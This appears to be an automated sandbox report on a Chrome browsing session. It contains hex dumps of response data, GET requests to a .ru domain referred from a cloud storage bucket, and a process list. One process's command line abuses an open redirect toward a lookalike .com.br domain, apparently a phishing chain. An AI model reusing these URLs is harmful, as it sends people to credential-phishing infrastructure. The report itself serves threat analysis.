                                                                          2024-10-29 15:51:43 UTC1369INData Raw: 95 45 34 79 e0 81 1f 44 43 74 91 10 31 62 7c e2 2f 01 12 f2 95 e8 d7 24 c4 9d d8 bc ff 1f a7 e5 bf fb 24 bd 27 59 b2 08 6d d9 92 2c c9 b1 e3 c4 b2 ad c8 c1 81 74 93 81 cd 2c 36 8b 90 a5 4e 69 b6 e5 f9 29 21 66 97 e7 b4 b3 2d 4f 11 3e 20 27 3f cf cf 9a 7f cf d5 a7 92 bc 98 bc c9 4c 32 93 97 e4 e5 65 44 57 d9 65 97 15 63 59 d8 c5 a5 e2 f3 ff 87 2a d4 a9 d3 42 9d f6 0b fd 0a d5 2d 35 a3 d4 8c 2f 66 19 ff ff 69 9a de f7 ff cc ff 33 ac 61 69 24 db b2 25 5b 36 cb 80 4b f6 02 60 80 c0 61 07 78 83 ec b6 09 3b 05 4c d8 a7 71 4e 5d 76 79 0b ec 02 6f 43 08 ff cf f3 67 fe 3a bb 33 05 a7 f2 ad 94 49 95 0a 1c 64 a0 97 9f bc 5a fa 94 fc ef 7b 2b ad f6 40 02 65 46 56 f7 cc b4 d4 39 32 46 c8 75 81 a3 e5 56 69 db d7 39 f7 fd c5 7d ef 7f b3 79 df 3d 16 df 3d 72 f1 3d 22 17
                                                                          Data Ascii: E4yDCt1b|/$$'Ym,t,6Ni)!f-O> '?L2eDWecY*B-5/fi3ai$%[6K`ax;LqN]vyoCg:3IdZ{+@eFV92FuVi9}y==r="
                                                                          2024-10-29 15:51:43 UTC1369INData Raw: f4 84 5e d0 1b fa 40 5f e8 07 fd 61 00 0c 84 41 30 18 86 c0 50 18 06 c3 61 04 8c 84 51 30 1a c6 c0 58 18 07 e3 61 02 4c cc 57 22 5f ab 7c ad f3 b5 c9 d7 2e df 6a cd 4f 8b d0 1c 5a 56 ad 81 d6 52 6b a7 cd d2 e6 39 ff 27 3e 4b aa 9e d4 3d e9 7d b2 92 5c 31 b9 61 f2 fa e4 8d c9 db 52 4a a4 0c 4f 39 92 72 57 0f d2 e3 f5 42 7a 31 bd 8a 5e c3 e8 67 0c 30 66 18 8b 8c 15 c6 46 e3 b5 e1 c4 08 cc 8f 05 b1 2c 56 c6 36 d8 11 fb e2 00 1c 88 43 71 04 8e c4 d1 38 15 a7 e3 2c 5c 8c ab 70 1d 6e c4 2d 78 00 cf e2 15 7c 84 6f f1 07 fe 45 13 d3 c8 4e 01 24 28 9a 8a 53 49 2a 47 55 a9 31 75 a5 1e 34 88 86 d2 70 9a 4a 33 68 01 ad a0 55 b4 9a d6 d3 46 da 43 07 e9 10 1d a1 53 74 8e ee d0 07 fa 42 1a 77 e6 31 3c 85 55 9e cd f3 78 29 af e5 0d bc 95 77 f1 09 be cc d7 f8 16 df e1 bb
                                                                          Data Ascii: ^@_aA0PaQ0XaLW"_|.jOZVRk9'>K=}\1aRJO9rWBz1^g0fF,V6Cq8,\pn-x|oEN$(SI*GU1u4pJ3hUFCStBw1<Ux)w
                                                                          2024-10-29 15:51:43 UTC1369INData Raw: 2d 33 c7 ea 2c da 66 8e 35 58 f4 e9 1c 6b b2 b8 fd 1c 6b b1 78 d6 1c 6b b3 78 b5 39 d6 61 f1 a5 73 ac cb e2 cb e7 58 8f c5 d7 8c 61 7d 96 4c 60 c9 44 6c c0 92 7d 68 4c 1b b1 e4 0e 96 dc 85 8d 59 f2 12 4b 5e c6 69 dc a8 f0 18 b6 a0 d1 83 46 6f 6c 49 63 34 0d b1 2d 8d b1 34 c6 63 b8 ab 31 9b c6 dc a3 ab b1 0c 8d 65 f1 18 37 77 7e cc d1 86 e6 ae 43 b4 a6 79 2c cd e3 f0 19 37 cf e0 39 f6 a0 79 de 10 7b d2 bc 94 e6 e5 98 ec 6a be 47 f3 43 dc c5 cd 05 c7 1c 07 92 3a cf 71 10 69 c4 1c 5d 48 a3 be f2 a5 96 71 9a c6 43 1c 4c 9a 4d 9a 83 b5 38 6d c8 73 b4 24 6d 36 c7 61 a4 9d c6 08 b7 90 76 26 ed 8a c3 49 bb 11 ca e3 ef 4e da 0b 47 91 f6 21 ed 8b e3 48 fb f1 1e 3a 9e b4 3f e9 00 9c 40 3a 94 74 14 4e 22 1d 43 3a 16 67 90 4e a0 31 9c 45 3a 95 74 26 ce 26 5d 40 73 5c
                                                                          Data Ascii: -3,f5Xkkxkx9asXa}L`Dl}hLYK^iFolIc4-4c1e7w~Cy,79y{jGC:qi]HqCLM8ms$m6av&ING!H:?@:tN"C:gN1E:t&&]@s\
                                                                          2024-10-29 15:51:43 UTC1369INData Raw: 29 37 2f 29 15 4a ea 37 af 66 9d 7c a9 54 ba b5 74 ab d4 c3 27 c4 76 e4 c1 13 2e e7 50 a2 89 ec f8 6f 49 f5 b5 39 e1 72 13 57 5a 9e 8c c7 e3 f1 73 65 d3 b3 e7 53 d8 82 29 7a 35 42 7e 5f 69 1d 85 a1 ee 67 9b 3a d2 4a 47 2a e2 06 37 d2 54 27 dc f0 4a 16 29 a5 fb b8 11 7d 7d 6e f0 50 07 dc 88 bb 69 32 18 e8 cd 78 53 c7 5a eb 24 fd df 15 b6 4e 55 54 e4 be 7d a4 24 4d b5 d6 9b 75 ae 49 91 17 03 bd 55 e4 d9 c4 b5 2c 4c 60 53 72 13 13 c7 76 37 36 9b 0b 40 28 76 aa 9a 40 a4 aa 41 e4 0a c3 f0 2a b5 a0 ba aa ff 51 10 c0 af d5 43 c1 28 33 84 23 bd 30 2c eb 46 0d 63 42 ec 9a 26 51 b5 1a 44 52 72 e6 fb b5 40 59 96 0b 53 cb 72 97 c0 24 8e ed 4a ce b1 c9 a5 28 97 98 c1 4b 02 98 69 0a b7 de 68 2f fa be 6d 92 8e 6b 59 96 e5 c6 84 73 cb 10 42 0a ca 18 37 0c 62 38 4e a5 cc
                                                                          Data Ascii: )7/)J7f|Tt'v.PoI9rWZseS)z5B~_ig:JG*7T'J)}}nPi2xSZ$NUT}$MuIU,L`Srv76@(v@A*QC(3#0,FcB&QDRr@YSr$J(Kih/mkYsB7b8N
                                                                          2024-10-29 15:51:43 UTC1369INData Raw: bb f7 ff 0f 86 a0 94 71 21 c4 6c ea 01 78 30 12 42 70 78 8e 10 82 df 76 1b 17 42 08 4a d9 c4 f6 7d 7b c2 28 15 31 52 55 46 23 f8 14 8c 50 88 56 b2 b6 d3 77 22 51 27 b3 dc 7d 27 d4 d8 cd 5c e1 60 83 38 eb 6c 22 db 0c b7 e7 9b a6 7f c1 03 46 b5 66 30 ce a3 f7 8d 9a 38 c4 34 c3 29 ed a1 82 f6 78 e5 89 84 51 2a 80 cf 1e cb e2 1b 60 f4 e7 66 36 7d 7c 8c ca f3 3d d8 84 09 3a 84 2e c2 63 46 ff 38 d4 51 a0 27 96 12 a7 e2 7c 80 c8 ec 15 26 d2 6e f7 73 d9 31 70 b2 69 76 16 56 52 60 03 47 9d fd 0b a5 72 5b 27 43 d8 7c 52 92 04 8d b9 9b 76 fd 85 fa 26 94 d5 89 20 cd 46 65 61 a1 43 9b b4 14 e1 19 53 90 2b 3b 62 84 e6 53 8c 60 8a 4e a2 9b 10 02 16 b1 14 a9 48 a1 29 f8 f2 81 94 fc db b0 0e 32 0f 36 66 44 b3 33 c3 10 43 1e 21 49 93 54 25 3c 73 3d ba 32 cf 31 ce f3 2b d3
                                                                          Data Ascii: q!lx0BpxvBJ}{(1RUF#PVw"Q'}'\`8l"Ff084)xQ*`f6}|=:.cF8Q'|&ns1pivVR`Gr['C|Rv& FeaCS+;bS`NH)26fD3C!IT%<s=21+
                                                                          2024-10-29 15:51:43 UTC1369INData Raw: 70 35 c1 e6 d5 cb b5 2a e0 e5 7d 87 cf 4e d6 75 55 04 10 a9 2e 18 85 d3 c0 1a be b6 23 8f f3 52 6f 29 5e 3f bc 6f 19 ef 4d 20 52 dd ae 8a c0 f7 c8 ff 0c 76 e0 43 e8 69 a9 04 97 5b 56 9b 3a ca 0a 94 d8 33 af b5 7b ec 62 a6 42 26 dc eb 22 fb 4d bd 07 b8 cc 82 d2 a9 9f 5f 46 b0 a9 25 69 a1 b9 4e f8 13 9b 94 30 2a 17 0f 60 a8 35 ea aa ea 4a c3 1d 16 27 fc 6a 2d 60 14 83 34 47 3e 28 8e e4 16 40 e0 07 72 bb 7d 9f 7f e2 dc 6e bb c3 e2 84 13 46 42 72 83 50 c7 91 76 10 d8 8c 6d b7 e1 3a d9 08 2c db aa b8 c0 2d bb 54 5e 6c 2e 8d aa 91 20 26 e7 18 80 09 47 4a 83 51 4c c0 e0 06 36 dd 8f 22 63 23 a5 04 30 7a e4 c7 95 dc 20 84 50 dc 6a 99 25 fe f0 f0 63 98 a0 18 93 0c 44 9e 14 85 84 82 08 ca 45 13 ec 91 9a 72 d0 67 ca e7 18 dc ef 09 97 7c cb 12 e6 f4 c1 a1 a5 b6 6b 59
                                                                          Data Ascii: p5*}NuU.#Ro)^?oM RvCi[V:3{bB&"M_F%iN0*`5J'j-`4G>(@r}nFBrPvm:,-T^l. &GJQL6"c#0z Pj%cDErg|kY
                                                                          2024-10-29 15:51:43 UTC1369INData Raw: d3 ae 54 02 e8 76 fb 44 6f 9e 37 d2 9b 44 df 57 4e 61 0a 53 74 0c 21 5f a5 83 4f 18 2c 1f 59 14 7a a0 b9 0e 75 a1 07 3a 57 6a 50 9d c5 df 51 ba d0 d5 20 a6 e4 0b 40 85 5a e9 81 4e 75 f8 3f 27 4f 9e a4 f4 0c a3 bb 94 9e fc d6 65 98 9d 61 60 9c bc ec 5b df ba ec a4 01 ec 0c c3 97 7d 0b 9e b4 be be 4e e9 01 8c 0f 50 ba 7e fa 25 ff be 7e 93 81 0f 60 76 96 c1 c6 fa 4b 5e b2 be 01 ec 2c c3 07 b0 71 d3 fa bf bf e4 34 42 88 20 34 f7 03 d6 55 50 0d e5 08 f5 04 b4 89 f1 95 5b 69 92 f6 3c cf eb 68 8f 70 41 1b 0f ea f5 0e 8e cc 7e a0 0b 58 71 64 e0 4a 29 83 50 ba 86 e1 cc 7e 0c d3 8b 06 83 01 94 97 1b 51 28 1c 47 84 51 bd ec 4a 71 e0 f3 86 94 41 24 5d d7 0d 85 e3 18 ff 3c 1b c1 74 3e c6 7d d5 86 2b 23 b5 b0 10 29 29 19 13 97 89 2b 7d c5 af b8 84 40 a7 d0 d3 d0 6d e8
                                                                          Data Ascii: TvDo7DWNaSt!_O,Yzu:WjPQ @ZNu?'Oea`[}NP~%~`vK^,q4B 4UP[i<hpA~XqdJ)P~Q(GQJqA$]<t>}+#))+}@m
                                                                          2024-10-29 15:51:43 UTC1369INData Raw: c3 86 e9 38 66 70 c7 1d 77 dc f1 ca ed 67 08 31 09 d9 1d 47 dc 15 ee c2 13 78 12 df 8d 67 f0 0b f8 3d 6a d2 88 a6 84 8c 8a a4 c8 e7 92 6e b9 50 33 35 0b 9a ab b2 42 a5 2a 5f 0f e5 db 01 79 db ec f6 c2 66 92 35 93 2a 2d 8a 0a ea 48 25 b2 cb 03 17 a5 4a b3 f5 b9 91 54 a1 12 f2 e7 27 6a 12 25 49 a2 86 7f e4 27 9b 64 52 a5 ef 9d 50 4e a2 8b 98 b2 44 85 52 0e 53 77 12 15 47 81 7e 31 51 61 f4 ec cb e4 f2 43 3e 86 d5 db 81 ea b6 b0 3d 89 92 c7 ce 34 99 96 60 30 46 a5 a6 c9 44 25 2a 2e a7 55 a5 16 65 a2 a4 76 63 5a 3e cd 9d 57 6a 56 2e aa 46 a1 de 0e 14 b7 4d 17 66 65 f5 a8 f3 4b 3d e3 a2 60 72 6b e6 b3 42 e6 d2 41 66 31 0d c9 8b 52 4d e7 73 35 93 3e 34 50 04 c7 c2 f5 99 96 4a 48 f7 4b f7 a2 52 2a 4e b2 d1 d5 a5 8a 93 a2 92 a8 3a ed 9c 42 5e 15 b3 6a 51 2a 93 a8
                                                                          Data Ascii: 8fpwg1Gxg=jnP35B*_yf5*-H%JT'j%I'dRPNDRSwG~1QaC>=4`0FD%*.UevcZ>WjV.FMfeK=`rkBAf1RMs5>4PJHKR*N:B^jQ*
                                                                          2024-10-29 15:51:43 UTC1369INData Raw: c2 a7 b6 bf b5 7d d3 f7 be f7 bd 7f f9 e5 77 bf fb dd 6f 43 8a 0f 5d 5a cc bf 0a ff 05 df 42 4f 40 a8 97 0c b4 de f2 5e f1 62 82 8e 6e c6 04 ae b0 c6 dc 12 78 11 a9 13 f0 01 83 ad 41 32 15 0d c4 25 d8 58 5f 14 c0 9f 76 3c cf 71 9a ad d5 0b cf 3b 6f 41 62 22 29 75 aa aa d5 c5 38 ea b6 30 76 a4 a4 18 db 96 69 db e5 b2 5b 62 98 38 9e e7 3a 04 07 65 e1 18 06 00 70 a3 cc ad 52 c5 0f 03 21 4b 1c 53 29 84 00 db 76 38 7d e2 62 ab d5 5b 5d 5d ed 74 dd 60 b1 79 fe 52 d2 6a 38 4e d2 6c f9 91 65 01 f6 00 18 37 0d 4a c3 7a 3d f4 6c ab e2 59 84 f9 81 ef 87 f5 4e ad cc 0d af ec 12 e6 56 2a 96 59 e2 b6 5f 2e 03 8b 54 c5 24 84 73 8c 85 6d 5b 26 a5 08 21 86 d0 9c b7 32 b4 84 5a 68 1b 9d 44 bb 08 f5 44 58 40 ba d8 2a 9d f6 ce 8b 4e a7 03 d0 c0 81 68 7d fe 79 89 27 a0 1d 56
                                                                          Data Ascii: }woC]ZBO@^bnxA2%X_v<q;oAb")u80vi[b8:epR!KS)v8}b[]]t`yRj8Nle7Jz=lYNV*Y_.T$sm[&!2ZhDDX@*Nh}y'V


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          33192.168.2.1649284188.114.96.34436672C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-29 15:51:58 UTC749OUTGET // HTTP/1.1
                                                                          Host: axelkirchhoffh.ru
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: navigate
                                                                          Sec-Fetch-User: ?1
                                                                          Sec-Fetch-Dest: document
                                                                          Referer: https://ax3si7hub1rr.objectstorage.ap-singapore-2.oci.customer-oci.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          34192.168.2.1649285188.114.96.34436672C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-29 15:52:05 UTC749OUTGET // HTTP/1.1
                                                                          Host: axelkirchhoffh.ru
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: navigate
                                                                          Sec-Fetch-User: ?1
                                                                          Sec-Fetch-Dest: document
                                                                          Referer: https://ax3si7hub1rr.objectstorage.ap-singapore-2.oci.customer-oci.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9


                                                                          Click to jump to process

                                                                          Click to jump to process

                                                                          Click to jump to process

                                                                          Target ID:0
                                                                          Start time:11:50:40
                                                                          Start date:29/10/2024
                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                          Imagebase:0x7ff7f9810000
                                                                          File size:3'242'272 bytes
                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          Target ID:1
                                                                          Start time:11:50:41
                                                                          Start date:29/10/2024
                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1988,i,5379668934890043754,15086957964497128916,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                          Imagebase:0x7ff7f9810000
                                                                          File size:3'242'272 bytes
                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          Target ID:2
                                                                          Start time:11:50:42
                                                                          Start date:29/10/2024
                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://lumen.backerkit.com/invites/mAqpu6B5ZtIAsrg4a5WdGA/confirm?redirect_path=//rahul-garg-lcatterton-com.athuselevadores.com.br"
                                                                          Imagebase:0x7ff7f9810000
                                                                          File size:3'242'272 bytes
                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:11
                                                                          Start time:11:51:50
                                                                          Start date:29/10/2024
                                                                          Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                          Imagebase:0x7ff663d70000
                                                                          File size:468'120 bytes
                                                                          MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:12
                                                                          Start time:11:51:50
                                                                          Start date:29/10/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6684c0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          No disassembly